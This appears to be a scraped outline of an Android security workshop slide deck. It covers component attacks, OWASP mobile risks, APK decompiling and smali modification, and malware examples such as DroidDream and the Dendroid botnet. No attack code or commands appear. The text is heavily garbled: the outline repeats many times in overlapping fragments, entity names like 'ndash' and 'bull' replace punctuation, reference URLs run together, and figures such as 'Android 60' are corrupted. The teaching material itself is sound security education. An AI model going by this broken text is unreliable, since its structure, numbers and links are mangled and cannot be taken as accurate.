- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Demo Time
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
DroidDream Malware
bull Steal sensitive datandash IMEI ndashgt block phonendash IMSIndash Device modelndash SDK
DroidDream example 1 - Paint
bull Access_coarse_location==GPSbull Read_phone_state
DroidDream example 11
DroidDream example 2 ndash Hotgirls
How to Protect Yourself
bull Go to Settings rarr Security rarr Turn OFF Allow installation from unknown sources
bull Always keep an up-to-date Anti-virus appbull Avoid unknown and unsecured Wi-Fi hotspots
Summary
bull Obfuscate the code and mitigate the lack of binary protection using anti-emulatoretc
bull Be aware of what permissions yoursquore giving to the application
bull danielramirezmartingmailcom
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK: how it works
- Android Application Security
- Android 6.0
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when needed
- Core security features to build a secure application
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk about…
- Before we start… the threat model
- M2 - Insecure data storage
- Insecure data storage – what it is
- Insecure data storage – what to look for
- Insecure data storage – how to find
- Insecure data storage - demo
- Insecure data storage – real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection – what it is
- What do you mean „incorrectly”
- Certificate inspection in web applications – chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection – how to find
- Insufficient transport layer protection – example
- Insufficient transport layer protection – few facts from reality
- Insufficient transport layer protection – mitigations
- M4 - Unintended data leakage
- Unintended data leakage – what it is
- Unintended data leakage – common leakage points
- Unintended data leakage – how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication – what is it
- Poor Authorization and Authentication – how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication – real example
- And always remember to…
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography – what it is
- Broken Cryptography – how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography – real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection – what it is
- Client side injection – what to inject
- A new Android's toy – the Intents
- Client side injection – how to find
- Client side injection – real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling – what it is
- Improper session handling – how to find
- Improper session handling – few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering & Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling - Dex2Jar
- Decompiling – Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1 - Flappy-bird
- Malware 1 - Flappy-bird (2)
- Malware 2 - iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet - malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 1.1
- DroidDream example 2 – Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-
Referencesbull httpsmanifestsecuritycomandroid-application-securitybull httpsgithubcomstrazzereanti-emulatorbull BookThe mobile hackers handbookbull BookAndroid Hackers Handbookbull httpdarkmattersnorsecorpcom20150715how-to-reverse-engineer-androi
d-applications
bull httpsblognetspicomattacking-android-applications-with-debuggersbull http
briskinfosecblogspotcouk201407apktool-for-android-security-test-inhtmlbull httpsdecompileandsecureapkwordpresscom20140510decompile-and-sec
ure-android-apk
bull httphackerz-innblogspotcouk201412android-botnet-dendroid-step-by-stephtml
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK how itrsquos works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure applicaton
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
- Broadcast receivers attacks (3)
- Broadcast receivers attacks (4)
- General defenses for App Components
- References
- Thank you
- OWASP top 10 mobile risks
- Important notes
- What are we going to talk abouthellip
- Before we starthellip the threat model
- M2 - Insecure data storage
- Insecure data storage ndash what it is
- Insecure data storage ndash what to look for
- Insecure data storage ndash how to find
- Insecure data storage - demo
- Insecure data storage ndash real example
- Insecure data storage - mitigations
- M3 - Insufficient transport layer protection
- Insufficient transport layer protection ndash what it is
- What do you mean bdquoincorrectlyrdquo
- Certificate inspection in web applications ndash chain of trust
- Cert Pinning - theory
- Cert Pinning - reality
- Insufficient transport layer protection- how to find
- Insufficient transport layer protection- example
- Insufficient transport layer protection-few facts from reality
- Insufficient transport layer protection- mitigations
- M4 - Unintended data leakage
- Unintended data leakage ndash what it is
- Unintended data leakage ndash common leakage points
- Unintended data leakage ndash how to find
- Unintended data leakage - demo
- Unintended data leakage - mitigations
- M5 - Poor Authorization and Authentication
- Poor Authorization and Authentication ndash what is it
- Poor Authorization and Authentication ndash how to find
- Poor Authorization and Authentication - demo
- Poor Authorization and Authentication ndash real example
- And always remember tohellip
- Poor Authorization and Authentication - mitigations
- M6 - Broken Cryptography
- Broken Cryptography ndash what it is
- Broken Cryptography ndash how to find
- Broken Cryptography - example
- Broken Cryptography - example (2)
- Broken Cryptography ndash real example
- Broken Cryptography - mitigations
- M7 - Client side injection
- Client side injection ndash what it is
- Client side injection ndash what to inject
- A new Androidrsquos toy ndash the Intents
- Client side injection ndash how to find
- Client side injection ndash real example
- Client side injection - mitigations
- M9 - Improper session handling
- Improper session handling ndash what it is
- Improper session handling ndash how to find
- Improper session handling ndash few facts from reality
- Improper session handling - mitigations
- Thank you
- References (2)
- Reverse Engineering amp Malware Analysis
- Anatomy of an apk
- Getting our apk file
- Decompiling || Disassembling
- Decompiling
- Decompiling-Dex2Jar
- Decompiling ndash Java Decompilers
- JD-GUI
- Luyten
- Slide 126
- Disassembling
- Disassembling (2)
- Signing apk
- Demo Time
- Demo Decompiling Luyten
- Demo Modify Smali Files
- Demo
- Lack of binary protection
- Techniques to mitigate the Lack of Binary Protection
- Verify Sign
- Obfuscated
- Anti-Emulator
- Debuggable
- Demo Time 2
- Demo
- Demo Decompiling Luyten (2)
- Demo Modify Smali Files (2)
- Demo (2)
- Recap
- Malware
- Malware Statistics 1
- Malware Statistics 2
- Malware 1-Flappy-bird
- Malware 1-Flappy-bird (2)
- Malware 2-iMatch
- Permissions Dangerous 1
- Permissions Dangerous 2
- Dendroid botnet
- Dendroid botnet -malware
- Dendroid botnet - Manifest
- Demo Time (2)
- DroidDream Malware
- DroidDream example 1 - Paint
- DroidDream example 11
- DroidDream example 2 ndash Hotgirls
- How to Protect Yourself
- Summary
- Slide 164
- Slide 165
- References (3)
-